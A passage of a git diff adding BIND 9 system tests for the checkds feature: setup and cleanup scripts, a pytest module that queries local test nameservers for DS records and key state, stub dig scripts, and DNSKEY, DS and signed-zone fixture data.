MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if [ "$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2> /dev/null)" -ge 2 ] + then + : + else + echo_i "This test requires the dnspython >= 2.0.0 module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/checkds/setup.sh b/bin/tests/system/checkds/setup.sh new file mode 100644 index 0000000..93c73b6 --- /dev/null +++ b/bin/tests/system/checkds/setup.sh @@ -0,0 +1,40 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh + +set -e + +$SHELL clean.sh + +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns9/named.conf.in ns9/named.conf + +# Setup zones +( + cd ns9 + $SHELL setup.sh +) +( + cd ns5 + $SHELL setup.sh +) +( + cd ns2 + $SHELL setup.sh +) diff --git a/bin/tests/system/checkds/tests_checkds.py b/bin/tests/system/checkds/tests_checkds.py new file mode 100755 index 0000000..a52833e --- /dev/null +++ b/bin/tests/system/checkds/tests_checkds.py @@ -0,0 +1,450 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import mmap +import os +import subprocess +import sys +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.exception +import dns.message +import dns.name +import dns.query +import dns.rcode +import dns.rdataclass +import dns.rdatatype +import dns.resolver + + +pytestmark = pytest.mark.skipif( + sys.version_info < (3, 7), reason="Python >= 3.7 required [GL #3001]" +) + + +def has_signed_apex_nsec(zone, response): + has_nsec = False + has_rrsig = False + + ttl = 300 + nextname = "a." + types = "NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY" + match = "{0} {1} IN NSEC {2}{0} {3}".format(zone, ttl, nextname, types) + sig = "{0} {1} IN RRSIG NSEC 13 2 300".format(zone, ttl) + + for rr in response.answer: + if match in rr.to_text(): + has_nsec = True + if sig in rr.to_text(): + has_rrsig = True + + if not has_nsec: + print("error: missing apex NSEC record in response") + if not has_rrsig: + print("error: missing NSEC signature in response") + + return has_nsec and has_rrsig + + +def do_query(server, qname, qtype, tcp=False): + query = dns.message.make_query(qname, qtype, use_edns=True, want_dnssec=True) + try: + if tcp: + response = dns.query.tcp( + query, server.nameservers[0], timeout=3, port=server.port + ) + else: + response = dns.query.udp( + query, server.nameservers[0], timeout=3, port=server.port + ) + except dns.exception.Timeout: + print( + "error: query timeout for query {} {} to {}".format( + qname, qtype, server.nameservers[0] + ) + ) + return None + + return response + + +def verify_zone(zone, transfer): + verify = os.getenv("VERIFY") + assert verify is not None + + filename = "{}out".format(zone) + with open(filename, "w", encoding="utf-8") as file: + for rr in transfer.answer: + file.write(rr.to_text()) + file.write("\n") + + # dnssec-verify command with default arguments. + verify_cmd = [verify, "-z", "-o", zone, filename] + + verifier = subprocess.run(verify_cmd, capture_output=True, check=True) + + if verifier.returncode != 0: + print("error: dnssec-verify {} failed".format(zone)) + sys.stderr.buffer.write(verifier.stderr) + + return verifier.returncode == 0 + + +def read_statefile(server, zone): + addr = server.nameservers[0] + count = 0 + keyid = 0 + state = {} + + response = do_query(server, zone, "DS", tcp=True) + if not isinstance(response, dns.message.Message): + print("error: no response for {} DS from {}".format(zone, addr)) + return {} + + if response.rcode() == dns.rcode.NOERROR: + # fetch key id from response. + for rr in response.answer: + if rr.match( + dns.name.from_text(zone), + dns.rdataclass.IN, + dns.rdatatype.DS, + dns.rdatatype.NONE, + ): + if count == 0: + keyid = list(dict(rr.items).items())[0][0].key_tag + count += 1 + + if count != 1: + print( + "error: expected a single DS in response for {} from {}," + "got {}".format(zone, addr, count) + ) + return {} + else: + print( + "error: {} response for {} DNSKEY from {}".format( + dns.rcode.to_text(response.rcode()), zone, addr + ) + ) + return {} + + filename = "ns9/K{}+013+{:05d}.state".format(zone, keyid) + print("read state file {}".format(filename)) + + try: + with open(filename, "r", encoding="utf-8") as file: + for line in file: + if line.startswith(";"): + continue + key, val = line.strip().split(":", 1) + state[key.strip()] = val.strip() + + except FileNotFoundError: + # file may not be written just yet. + return {} + + return state + + +def zone_check(server, zone): + addr = server.nameservers[0] + + # wait until zone is fully signed. + signed = False + for _ in range(10): + response = do_query(server, zone, "NSEC") + if not isinstance(response, dns.message.Message): + print("error: no response for {} NSEC from {}".format(zone, addr)) + elif response.rcode() == dns.rcode.NOERROR: + signed = has_signed_apex_nsec(zone, response) + else: + print( + "error: {} response for {} NSEC from {}".format( + dns.rcode.to_text(response.rcode()), zone, addr + ) + ) + + if signed: + break + + time.sleep(1) + + assert signed + + # check if zone if DNSSEC valid. + verified = False + transfer = do_query(server, zone, "AXFR", tcp=True) + if not isinstance(transfer, dns.message.Message): + print("error: no response for {} AXFR from {}".format(zone, addr)) + elif transfer.rcode() == dns.rcode.NOERROR: + verified = verify_zone(zone, transfer) + else: + print( + "error: {} response for {} AXFR from {}".format( + dns.rcode.to_text(transfer.rcode()), zone, addr + ) + ) + + assert verified + + +def keystate_check(server, zone, key): + val = 0 + deny = False + + search = key + if key.startswith("!"): + deny = True + search = key[1:] + + for _ in range(10): + state = read_statefile(server, zone) + try: + val = state[search] + except KeyError: + pass + + if not deny and val != 0: + break + if deny and val == 0: + break + + time.sleep(1) + + if deny: + assert val == 0 + else: + assert val != 0 + + +def wait_for_log(filename, log): + found = False + + for _ in range(10): + print("read log file {}".format(filename)) + + try: + with open(filename, "r", encoding="utf-8") as file: + s = mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) + if s.find(bytes(log, "ascii")) != -1: + found = True + except FileNotFoundError: + print("file not found {}".format(filename)) + + if found: + break + + print("sleep") + time.sleep(1) + + assert found + + +def test_checkds_dspublished(named_port): + # We create resolver instances that will be used to send queries. + server = dns.resolver.Resolver() + server.nameservers = ["10.53.0.9"] + server.port = named_port + + parent = dns.resolver.Resolver() + parent.nameservers = ["10.53.0.2"] + parent.port = named_port + + # DS correctly published in parent. + zone_check(server, "dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone dspublished.checkds/IN (signed): checkds: DS response from 10.53.0.2", + ) + keystate_check(parent, "dspublished.checkds.", "DSPublish") + + # DS correctly published in parent (reference to parental-agent). + zone_check(server, "reference.checkds.") + wait_for_log( + "ns9/named.run", + "zone reference.checkds/IN (signed): checkds: DS response from 10.53.0.2", + ) + keystate_check(parent, "reference.checkds.", "DSPublish") + + # DS not published in parent. + zone_check(server, "missing-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone missing-dspublished.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "missing-dspublished.checkds.", "!DSPublish") + + # Badly configured parent. + zone_check(server, "bad-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad-dspublished.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad-dspublished.checkds.", "!DSPublish") + + # TBD: DS published in parent, but bogus signature. + + # DS correctly published in all parents. + zone_check(server, "multiple-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone multiple-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone multiple-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + keystate_check(parent, "multiple-dspublished.checkds.", "DSPublish") + + # DS published in only one of multiple parents. + zone_check(server, "incomplete-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "incomplete-dspublished.checkds.", "!DSPublish") + + # One of the parents is badly configured. + zone_check(server, "bad2-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad2-dspublished.checkds.", "!DSPublish") + + # TBD: DS published in all parents, but one has bogus signature. + + # TBD: Check with TSIG + + +def test_checkds_dswithdrawn(named_port): + # We create resolver instances that will be used to send queries. + server = dns.resolver.Resolver() + server.nameservers = ["10.53.0.9"] + server.port = named_port + + parent = dns.resolver.Resolver() + parent.nameservers = ["10.53.0.2"] + parent.port = named_port + + # DS correctly published in single parent. + zone_check(server, "dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "dswithdrawn.checkds.", "DSRemoved") + + # DS not withdrawn from parent. + zone_check(server, "missing-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone missing-dswithdrawn.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + keystate_check(parent, "missing-dswithdrawn.checkds.", "!DSRemoved") + + # Badly configured parent. + zone_check(server, "bad-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad-dswithdrawn.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad-dswithdrawn.checkds.", "!DSRemoved") + + # TBD: DS published in parent, but bogus signature. + + # DS correctly withdrawn from all parents. + zone_check(server, "multiple-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone multiple-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone multiple-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + keystate_check(parent, "multiple-dswithdrawn.checkds.", "DSRemoved") + + # DS withdrawn from only one of multiple parents. + zone_check(server, "incomplete-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + keystate_check(parent, "incomplete-dswithdrawn.checkds.", "!DSRemoved") + + # One of the parents is badly configured. + zone_check(server, "bad2-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad2-dswithdrawn.checkds.", "!DSRemoved") + + # TBD: DS withdrawn from all parents, but one has bogus signature. diff --git a/bin/tests/system/checkdstool/clean.sh b/bin/tests/system/checkdstool/clean.sh new file mode 100644 index 0000000..fb853c5 --- /dev/null +++ b/bin/tests/system/checkdstool/clean.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f checkds.* +rm -f ns*/named.lock diff --git a/bin/tests/system/checkdstool/dig.bat b/bin/tests/system/checkdstool/dig.bat new file mode 100755 index 0000000..9465a46 --- /dev/null +++ b/bin/tests/system/checkdstool/dig.bat @@ -0,0 +1,32 @@ +@echo off +set ext= +set file= + +:loop +@set arg=%1 +if "%arg%" == "" goto end +if "%arg:~0,1%" == "+" goto next +if "%arg%" == "-t" goto next +if "%arg%" == "ds" goto ds +if "%arg%" == "DS" goto ds +if "%arg%" == "dnskey" goto dnskey +if "%arg%" == "DNSKEY" goto dnskey +set file=%arg% +goto next + +:ds +set ext=ds +goto next + +:dnskey +set ext=dnskey +goto next + +:next +shift +goto loop + +:end + +set name=%file%.%ext%.db +type %name% diff --git a/bin/tests/system/checkdstool/dig.pl b/bin/tests/system/checkdstool/dig.pl new file mode 100644 index 0000000..3713b2c --- /dev/null +++ b/bin/tests/system/checkdstool/dig.pl @@ -0,0 +1,41 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +my $arg; +my $ext; +my $file; + +foreach $arg (@ARGV) { + if ($arg =~ /^\+/) { + next; + } + if ($arg =~ /^-t/) { + next; + } + if ($arg =~ /^ds$/i) { + $ext = "ds"; + next; + } + if ($arg =~ /^dnskey$/i) { + $ext = "dnskey"; + next; + } + $file = $arg; + next; +} + +open F, $file . "." . $ext . ".db" || die $!; +while (<F>) { + print; +} +close F; diff --git a/bin/tests/system/checkdstool/dig.sh b/bin/tests/system/checkdstool/dig.sh new file mode 100755 index 0000000..7b3a1b2 --- /dev/null +++ b/bin/tests/system/checkdstool/dig.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +while [ "$#" != 0 ]; do + case $1 in + +*) shift ;; + -t) shift ;; + DS|ds) ext=ds ; shift ;; + DNSKEY|dnskey) ext=dnskey ; shift ;; + *) file=$1 ; shift ;; + esac +done + +cat ${file}.${ext}.db diff --git a/bin/tests/system/checkdstool/missing.example.dnskey.db b/bin/tests/system/checkdstool/missing.example.dnskey.db new file mode 100644 index 0000000..e372130 --- /dev/null +++ b/bin/tests/system/checkdstool/missing.example.dnskey.db @@ -0,0 +1,3 @@ +missing.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +missing.example. 3600 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjG rhhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA +u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy 347cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQ zBkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysy LKOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/b ByBNsO70aEFTd +missing.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/missing.example.ds.db b/bin/tests/system/checkdstool/missing.example.ds.db new file mode 100644 index 0000000..540ec0b --- /dev/null +++ b/bin/tests/system/checkdstool/missing.example.ds.db @@ -0,0 +1,2 @@ +missing.example. 3600 IN DS 12892 5 2 EF59E5C70BC4153B7DB4C11F9C36B729577DA71474E0A5C9B8875173 6E583200 +missing.example. 3600 IN DS 12892 5 1 9D4CD60491D372207FA584D2EE460CC51D7FF8A7 diff --git a/bin/tests/system/checkdstool/none.example.dnskey.db b/bin/tests/system/checkdstool/none.example.dnskey.db new file mode 100644 index 0000000..76ae905 --- /dev/null +++ b/bin/tests/system/checkdstool/none.example.dnskey.db @@ -0,0 +1,3 @@ +none.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +none.example. 3600 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjG rhhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA +u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy 347cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQ zBkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysy LKOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/b ByBNsO70aEFTd +none.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/none.example.ds.db b/bin/tests/system/checkdstool/none.example.ds.db new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/checkdstool/none.example.ds.db diff --git a/bin/tests/system/checkdstool/ok.example.dnskey.db b/bin/tests/system/checkdstool/ok.example.dnskey.db new file mode 100644 index 0000000..c767c8f --- /dev/null +++ b/bin/tests/system/checkdstool/ok.example.dnskey.db @@ -0,0 +1,2 @@ +ok.example. 625 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjGr hhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA+ u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy3 47cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQz Bkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysyL KOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/bB yBNsO70aEFTd +ok.example. 625 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/ok.example.ds.db b/bin/tests/system/checkdstool/ok.example.ds.db new file mode 100644 index 0000000..96b159b --- /dev/null +++ b/bin/tests/system/checkdstool/ok.example.ds.db @@ -0,0 +1,2 @@ +ok.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ok.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 diff --git a/bin/tests/system/checkdstool/prep.example.db b/bin/tests/system/checkdstool/prep.example.db new file mode 100644 index 0000000..5ba5987 --- /dev/null +++ b/bin/tests/system/checkdstool/prep.example.db @@ -0,0 +1,121 @@ +; File written on Thu Oct 5 23:44:34 2017 +; dnssec_signzone version 9.12.0a1 +prep.example. 300 IN SOA ns1.prep.example. hostmaster.prep.example. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + 300 RRSIG SOA 8 2 300 ( + 20171105054434 20171006054434 19260 prep.example. + 1fX0z7Swu4gMPews/ZE8bzNg+JXNedFBDGIH + PTSfVQtVLIvRWpME+PylX7MdVMZE/PST+x4/ + mWyveyjetEOo7/7aQL236FfI0y6TxQFy7HwC + FMieqoQCUluuKOvToxg4vUp4GOdlUGbqC63h + DbX5Z37VptJXLkt4niF4Kl2iD+U9/bk7HAEU + 4zDiKroYnusGKfVB9xAWddzoHdLxhVuPi7ut + 328suPdgX0bfs7uB+y4cikhGzAmPpNMlGHju + qYG74NcFGQNutLB7ayx/m87t7mTty7jbNKm3 + QWJSPf5IR8/kmzAi8HMnapY5vUmm+hX8JOfU + UtH7i0iEsUqRbEwu5A== ) + 300 NS ns1.prep.example. + 300 RRSIG NS 8 2 300 ( + 20171105054434 20171006054434 19260 prep.example. + u5sU2cfqNqIyCLw18ZNnFw28/GyRt0EOiPYS + dygmpfMDrvDaxjiiai8zWYjnl/E3qzVH9Zku + 07lEDORZdVb0uCDe1NynjAyw4AHps85cAwVc + 8HTSbzdVZsQTELpunYFJffh24PDr9unw7KOY + jzTP6qNedJ1uM54TOr177zfmBh7N2fkAoGyV + NjvTKrlgDYGNIn8/YMgHb4sNgyfe54MYY00f + kehVxfKnRCgDsbJ0Pk6jhBMCQWvOh8jG8WyV + ElAa/eMqlxUC1idF8ydWefjsI/7lPcjSalw9 + qZw4CDCLHHZy0TOSmCYRRZuIeVXzBfDPJyi4 + 2A3iLntKFJ4AOLFMJg== ) + 3600 NSEC ns1.prep.example. NS SOA RRSIG NSEC DNSKEY + 3600 RRSIG NSEC 8 2 3600 ( + 20171105054434 20171006054434 19260 prep.example. + Aed99/jdG82YAkKVWjoKOsAGtB3JnyKkCaAq + zgMrYkXU41y3KDCAmGzooGPQY7NN+WxX7FJ2 + 1nXkgljma/azgpsbi9ssneFtv7PPFClVmN+u + j+mM4MK/ZR7eJOsMqETg4PAO5VAh6c/GVmyA + RD/m6EhJVZEjPfLWbDoC4hVAgem7DP/NMjyI + GfztpDjMmyLQyv6tL+UEXSJHGp3ZEa5Z5i7X + Nl/bRTUlZs7L4rTgoqHv6LEmsXKAf9rZYq4b + eP6GF9I1Ry41MfHLc7lPUmtR38ErEsM5uGzw + trCQYEFhuRWUBxZ8OSL2EZK9rUBXZX+cwK/8 + ZP7mIfDfljkXPQcmow== ) + 3600 DNSKEY 256 3 8 ( + AwEAAfMzj6aZIgZDVcpH1pKOtq998E85+nEY + YJa0lLS8+QTCC1Efke8GLwsXT0IPTuwnOuXM + RjySirab0NuEr69T8KP/43YxcRdmCg89mjjN + szoVPPstC9xBKVOc0pRMDF7sfsTrSye3RY7+ + Z6uZEH5FOAkz2hNbJJHOn4HpNUhLPJGRauhf + 0evamwUmQ/mlhkVW5q4WmqPCDMNY3K6XtkEm + cvm8n9ZCXC9Z5AX6KpynujzLdKyxpdGqUk6r + lavp9ILPpRKoTZDX+2q1pDgP5cDndwtgNSvU + DBQZoD0psS2cyB3PHo+dPwwpEyM//ZSKsH9m + e85Ti0413TOWFyFd/jUOUA8= + ) ; ZSK; alg = RSASHA256 ; key id = 19260 + 3600 DNSKEY 257 3 8 ( + AwEAAbV8X06Qvk350aZ6eZ1d7WbT1H/Y0Sv7 + qAdbk5fbYIKpMvZ8D9xqoTHgD0z0uCgWWIcm + /xyKBfmax76oLwMBpR/kdtuJz0irgFITnJCH + pEfR9AJ/Mfm7NyMglq+/39I03E1/LXvpXQLG + tg+Mo/2CUE5sbG31jmPNK/2J8RMESkIi87fW + azZU/oyUEtECE5PGbdyw+4PacAsXNjnwl30T + aatL277wX4pt+IUPdE6EIph3t+dxXJ7OpHgW + 8g+YSHLlCImLVapdg3oD/cs6ncaBq9z7la5Y + dHNw2QAIAvQ11EsonrkonPqO6zNVZAVdT2VB + X5YzGAoCFUvbCvlnl2a7SxM= + ) ; KSK; alg = RSASHA256 ; key id = 65482 + 3600 RRSIG DNSKEY 8 2 3600 ( + 20171105054434 20171006054434 19260 prep.example. + pPw81pJ3PeF+tqEswTul9N8Qsl9JKgK4v8SV + lPfP0pnlMBMbtMFFkx5ZmhQg3Z3U8SdE64Bt + C5St3qItyyKdTQ0Rbm9mfV6twxDB8lVry8F7 + Pv7gJmmcWzBcbLGcrXIrVNSZhigkemQXTElj + P8y1j7kaNFWBWbDMn7KesiZ9BiC6sqvuKa3R + wSofjwXTESspWZP0NtXr5ymaBIMR9UtNj5Wh + jm1+tg6BxNBKxhCHlSC0ltPS/qq9J1ZUmtJz + sj/EAFfPVJVuEveebMvi1oDWPTgajO9+EHl4 + ELrgnQHCgaybMzbpd/A5+Tr1hQkv48I8Mb0/ + 8LJ2/6xrvJm64yRteg== ) + 3600 RRSIG DNSKEY 8 2 3600 ( + 20171105054434 20171006054434 65482 prep.example. + WeIWiC9SnBe2+UocVjpap62O8Rz+iljwJiu9 + VlGUwct3Vydq4/4FVAKdPklXV5cYbBLhO2MB + 3R4toX8RNU/0Ny8DnugQzLKvVfg0xoyU/UAJ + k4aWa/vPivSLGouLQPiNp71bdXN4LB/2xmzu + cPYXzS9ePpwCOp/9JLoNjBSMQkfjfWAcaNtj + 1DKDmHHL1sPMizninxSJLQOAKb+JwUAjAkOM + O1JqwkB12/IZuzxN5hly+uNsbFFxPzQkcnJ4 + 5bhzxuh5D/JRXW0nF5aO4aR+9X+lSUpDJQZ1 + 5fOt1cybZCn/ag68RA92zrnisdbrggJGS003 + wn/VKbLVfFj3eQrfNA== ) +ns1.prep.example. 300 IN A 1.1.1.1 + 300 RRSIG A 8 3 300 ( + 20171105054434 20171006054434 19260 prep.example. + QUyDyJVk3JGEq+VTZtY3firzsRqOA0LUm3Tf + /fnemQBeOlMda2ErA7DqYVriIGfM8jph416E + YX8SKAZXGEAlsEbC9cWBVyc5TYH6tZ43sV51 + 55kGTiUY92NnrH10Q+m2SLAEEaKCA/cgBwOR + tN2Wb1meHgiLbGYN2LbANfDQzoEk4AYAgT6r + wDKVVg/V9Ed7JnCnBQc9MN9+LQ3h4NBGUiEY + mr7HX2w+yzqcGFNLI1aFPe2IwFt120QPLyyl + cZgc6FUBX4YCnWoCb0aFyyOT76AQkKF5YBRn + gAv6S8q1pZ/0B5w4gjaLEGlts3LG0bxZ1GJd + gCQMEhgYgyXUchTtZA== ) + 3600 NSEC prep.example. A RRSIG NSEC + 3600 RRSIG NSEC 8 3 3600 ( + 20171105054434 20171006054434 19260 prep.example. + rDWN40u1a3DSzWOrS+4YR2XOxaem0BAQ/glN + QkXNDew1WsZo3fe0IHIhDKlJ/5MJAfAHq8Xs + A5UGUw2efoNAN/0LuWsI/9IPm4dwQOXiTCly + uxugXf5islPYyvn1Z14ay/7/2P3W6HZknXzo + lZFpwqfFZQCxz7c/1aH+2ntAMeqx8LHuewSr + Rz/sLsSiCcZQ6NMWnZdoC5SGy4CTcIIPPS8z + 9dQ6QYTC5iq4MKRfyJUyvODyU9be4e6jbo5b + 